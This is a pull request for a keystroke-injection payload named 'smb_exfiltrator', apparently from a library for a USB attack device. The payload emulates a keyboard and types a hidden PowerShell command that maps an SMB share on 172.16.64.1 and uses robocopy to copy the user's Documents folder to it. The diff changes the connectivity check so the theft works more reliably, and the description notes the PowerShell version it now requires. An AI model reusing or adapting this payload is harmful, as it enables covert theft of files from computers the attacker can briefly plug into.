### PR TITLE
requires Powershell v4 ; Win8.1/Svr2012R2

### DIFF
--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -40,7 +40,7 @@ LED R G
 ATTACKMODE HID
 QUACK GUI r
 QUACK DELAY 500
-QUACK STRING PowerShell -WindowStyle Hidden \"Do {Test-Connection 172.16.64.1 -count 1 -quiet} until ($?); sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$HOME\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S\"
+QUACK STRING PowerShell -WindowStyle Hidden \"Do {Test-NetConnection 172.16.64.1 SMB -InformationLevel quiet} until ($?); net use \\\172.16.64.1\e guest /USER:guest; robocopy \$HOME\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S\"
 QUACK ENTER
 
 # Clear tracks?


### PR DESCRIPTION
CHANGE ; REASON ; IMPACT ON OPERABILITY / PERFORMANCE
change 'Test-Connection' to 'Test-NetConnection' ; Test SMB connection, rather than ping ; requires Powershell v4, introduced @ Win8.1/Srv2012R2
Remove 'sleep 2' ; no longer necessary ; Requires Test-NetConnection cmdlet